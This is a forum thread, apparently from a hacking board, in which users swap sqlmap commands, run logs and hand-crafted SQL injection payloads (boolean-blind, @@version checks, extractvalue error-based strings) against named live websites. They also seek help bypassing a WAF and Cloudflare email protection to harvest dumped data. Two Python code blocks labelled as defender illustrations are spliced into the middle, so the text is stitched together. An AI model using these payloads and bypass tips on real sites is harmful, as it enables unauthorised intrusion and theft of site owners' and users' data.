Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. BabaDook

    BabaDook Well-Known Member

    sqlmap -u "http://www.site/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa*/page/ " --dbs
     
  2. kcash

    kcash New Member

    How do I work this resource all the way to the end?


    [*] starting at 06:41:49
    [06:41:49] [INFO] parsing HTTP request from 'r.txt'
    custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
    [06:41:51] [INFO] resuming back-end DBMS 'microsoft access'
    [06:41:51] [INFO] testing connection to the target URL
    [06:41:53] [INFO] heuristics detected web page charset 'windows-1251'
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.bok-o-bok.ru:80/filmoteka.asp?film=412 AND 9579=9579&lan=2
    ---
    [06:41:53] [INFO] the back-end DBMS is Microsoft Access
    web server operating system: Windows 2008 R2 or 7
    web application technology: ASP.NET, Microsoft IIS 7.5, ASP
    back-end DBMS: Microsoft Access
    [06:41:53] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
    [06:41:53] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
    [06:41:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [06:41:53] [INFO] retrieved:
    you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
    [06:41:56] [INFO] heuristics detected web page charset 'ascii'
    [06:41:56] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
    [06:41:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
    [06:41:56] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
    [06:41:56] [ERROR] cannot retrieve table names, back-end DBMS is Access
    do you want to use common table existence check? [Y/n/q] y
    which common tables (wordlist) file do you want to use?
    [1] default 'C:\Python27\sqlmap\txt\common-tables.txt' (press Enter)
    [2] custom
    > 1
    [06:42:03] [INFO] checking table existence using items from 'C:\Python27\sqlmap\txt\common-tables.txt'
    [06:42:03] [INFO] adding words used on web page to the check list
    please enter number of threads? [Enter for 1 (current)] 4
    [06:42:13] [INFO] starting 4 threads
    [06:45:57] [WARNING] no table(s) found
    No tables found
    [06:45:57] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 3143 times
     
  3. aparsera

    aparsera New Member

    There's a boolean-based one of this format: x.php?q=1' OR 1=1 OR 'bla'='bla

    But sqlmap doesn't see it, I suspect because of the OR OR.
    I think boolean_blind.xml needs to be adjusted, right? Who can help me write the rule correctly?

    upd

    I changed it; now it sees the injection but says it's a false positive. How do I fix this?

    <test>
    <title>OR boolean-based blind - WHERE or HAVING clause</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1,9</clause>
    <where>2</where>
    <vector>OR [INFERENCE]</vector>
    <request>
    <payload>%27OR 1=1 OR %273%27=%273</payload>
    </request>
    <response>
    <comparison>%27OR 1=2 OR %273%27=%273</comparison>
    </response>
    </test>


    [03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
    [03:55:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
    [03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a false positive
    [03:56:05] [WARNING] false positive or unexploitable injection point detected
    [03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
     
    #903 aparsera, 31 May 2019
    Last edited: 31 May 2019
  4. winstrool

    winstrool ~~*MasterBlind*~~

    For sqlmap to see a vector via OR you need to specify --risk=3.
     
  5. Timon B.

    Timon B. Member

    How can I get around Cloudflare email protection, when instead of emails the dump contains: /cdn-cgi/l/email-protection" class="cf_email" data-
    I found the IP behind Cloudflare and put it in the hosts file in Windows. But sqlmap/python ignores it.

    Thanks
     
  6. den4ik1090

    den4ik1090 New Member

    Can someone tell me how to get this working in sqlmap:
    [IMG]
     
  7. sepo

    sepo Member

    Hi all, can anyone help me hammer this site:
    Code:
    http://wrappers.ru/?act=polls&poll=1%22%27
     
  8. ms13

    ms13 Well-Known Member

    What does "hammer" mean?
    Hi..
     
  9. BabaDook

    BabaDook Well-Known Member

    1 - you've posted in the wrong section
    2 - there's a WAF there
    3 - it's not clear what you want. Ask a precise question or describe the problem.
    Code:
    http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
     
    #909 BabaDook, 21 Jun 2019
    Last edited: 21 Jun 2019
  10. sepo

    sepo Member

    thanks
     
  11. hubby666

    hubby666 New Member

    Hi all, a question: I have a bunch of links that need to be gone through; I hand them to sqlmap and walk away. How can I make it mark the vulnerable links somehow? As I understand it, it puts everything into the output indiscriminately, i.e. every link it went through. Thanks.
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Check the request manually to see what the WAF triggers on, bypass it, and write your own tamper for it.
     
  13. BabaDook

    BabaDook Well-Known Member

    it happens, use the old version
     
  14. BenderMR

    BenderMR Member

    Good day, gentlemen.
    I have this SQLi:
    Code:
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    It seems to be an INSERT statement, because if you don't add another comma-separated parameter after the ' you get this error:
    Code:
     Column count doesn't match value count at row 1
    Tell me, is it realistic to feed this into sqlmap, and how?
     
  15. LeninDie

    LeninDie Member

    Hi. Can someone tell me how to point sqlmap at which data changes? The SQLi is blind.
    The vulnerable parameter in the cookies is identifyId: amplitude_idundefined={"optOut":false,"sessionId":null,"lastEventTime":null,"eventId":0,"identifyId":027179381' or 3726=3726--,"sequenceNumber":0}; as I understand it I need to add --string="no idea what goes here"
    [IMG]
     
    #915 LeninDie, 5 Aug 2019
    Last edited: 5 Aug 2019
  16. b3

    b3 Moderator

    What you have there is a response, not a request.
     
    _________________________
  17. LeninDie

    LeninDie Member

    I've added to it.
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Guarantor - Escrow Service

    Do it via

    Code:
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27-extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    
    https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27/extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
    and variations
     
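An added defender-side illustration, not code from any poster: a small log classifier that replays the probe shapes quoted in this thread (the AND n=n pair in kcash's sqlmap log, aparsera's OR tautology, BabaDook's @@version check, and the extractvalue() payloads from BenderMR and BigBear) over constructed access-log lines, and also counts the burst of 5xx responses that kcash's "500 (Internal Server Error) - 3143 times" summary describes. The log lines, addresses and thresholds are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (TEST-NET addresses, not a real capture) replaying the probe
# shapes from this thread: sqlmap's AND n=n pair, the OR tautology, the manual @@version check
# and the extractvalue()/concat/**/ error-based payload; the last line is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jun/2019:06:41:53 +0300] "GET /filmoteka.asp?film=412%20AND%209579%3D9579&lan=2 HTTP/1.1" 200 5123
203.0.113.5 - - [21/Jun/2019:06:41:54 +0300] "GET /filmoteka.asp?film=412%20AND%209579%3D9580&lan=2 HTTP/1.1" 500 311
203.0.113.5 - - [21/Jun/2019:06:41:55 +0300] "GET /x.php?q=1%27%20OR%201%3D1%20OR%20%27bla%27%3D%27bla HTTP/1.1" 200 4410
203.0.113.5 - - [21/Jun/2019:06:41:56 +0300] "GET /?act=polls&poll=1%22+and+substring(@@version,1,1)=5+--+- HTTP/1.1" 200 2201
203.0.113.5 - - [21/Jun/2019:06:41:57 +0300] "GET /?p1=v1&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+- HTTP/1.1" 500 188
198.51.100.7 - - [21/Jun/2019:06:42:00 +0300] "GET /filmoteka.asp?film=412&lan=2 HTTP/1.1" 200 5123
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Signatures run against the URL-decoded query string, case-insensitively.
SIGNATURES = {
    "boolean_numeric_compare": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),   # AND 9579=9579, OR 1=1
    "boolean_string_compare": re.compile(r"\b(?:and|or)\s+'[^']*'\s*=\s*'", re.I),  # OR 'bla'='bla
    "version_fingerprint": re.compile(r"@@version", re.I),                           # substring(@@version,1,1)=5
    "error_based_xml": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),      # extractvalue(0x0a, ...)
    "inline_comment": re.compile(r"/\*\*/"),                                         # concat/**/( keyword splitting
}

def classify(query):
    """Names of every signature that fires on a decoded query string."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def analyze(log_text, error_threshold=2):
    """Return (findings, noisy_ips). findings: (ip, raw_path, tags) for each line that matched;
    noisy_ips: sources with >= error_threshold 5xx responses, the burst behind a summary like
    '500 (Internal Server Error) - 3143 times' in the sqlmap log quoted earlier in the thread."""
    findings, errors = [], Counter()
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        ip, path, status = m["ip"], m["path"], int(m["status"])
        if status >= 500:
            errors[ip] += 1
        tags = classify(unquote_plus(path.partition("?")[2]))
        if tags:
            findings.append((ip, path, tags))
    return findings, {ip for ip, n in errors.items() if n >= error_threshold}
```

In production the 5xx threshold would be set per time window rather than per file, and the signature list tuned against the application's own legitimate query patterns.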
  19. LeninDie

    LeninDie Member

    Can anyone suggest a solution?
     
  20. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Look for a string that is always present on the un-injected page and never changes (this is mandatory), but is absent when injected with a false condition.
    If some string gets added on a false response, then you need to use --not-string="bsdhbhsb", but only on condition that it is absent on the true response.
    At least that's what the manuals say.
     
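The selection rule in the post above, written out as an added illustration (not sqlmap's own code, and run on constructed responses): given two fetches of the un-injected page plus one true and one false injected response, it lists the fragments that meet the --string and --not-string conditions and discards anything that changes between fetches, such as the timestamp here. The same volatility check is why pages with per-request tokens or timestamps make these comparisons unreliable.

```python
import re

# Constructed responses (not from any real site): two fetches of the un-injected poll page, then
# the page with a TRUE and a FALSE boolean condition injected. The "Generated" timestamp changes
# on every fetch, which is exactly the kind of fragment that must not become a marker.
BASELINES = [
    "<h1>Polls</h1><div id=poll>Favourite colour?</div><span>Votes: 12</span><small>Generated 06:41:49</small>",
    "<h1>Polls</h1><div id=poll>Favourite colour?</div><span>Votes: 12</span><small>Generated 06:41:51</small>",
]
TRUE_RESP = "<h1>Polls</h1><div id=poll>Favourite colour?</div><span>Votes: 12</span><small>Generated 06:41:53</small>"
FALSE_RESP = "<h1>Polls</h1><div id=poll>Poll not found</div><small>Generated 06:41:54</small>"

def fragments(body):
    """Visible text chunks of an HTML body (minimal tokenizer: split on tags, drop whitespace)."""
    return {frag.strip() for frag in re.split(r"<[^>]+>", body) if frag.strip()}

def shape(frag):
    """Digit-blind form of a fragment, so 'Generated 06:41:49' and 'Generated 06:41:51' compare equal."""
    return re.sub(r"\d+", "#", frag)

def choose_markers(baselines, true_resp, false_resp):
    """Apply the rule from the post above.
    --string candidates: stable across every un-injected fetch, present on TRUE, absent on FALSE.
    --not-string candidates: present on FALSE, absent on TRUE.
    Fragments whose shape varies between baseline fetches are discarded from both lists."""
    sets = [fragments(b) for b in baselines]
    stable = set.intersection(*sets)
    volatile_shapes = {shape(x) for x in set.union(*sets) - stable}

    def is_stable(frag):
        return shape(frag) not in volatile_shapes

    t, f = fragments(true_resp), fragments(false_resp)
    string_c = sorted(x for x in (stable & t) - f if is_stable(x))
    not_string_c = sorted(x for x in f - t if is_stable(x))
    return string_c, not_string_c

if __name__ == "__main__":
    s, ns = choose_markers(BASELINES, TRUE_RESP, FALSE_RESP)
    print("--string candidates:", s)        # ['Favourite colour?', 'Votes: 12']
    print("--not-string candidates:", ns)   # ['Poll not found']
```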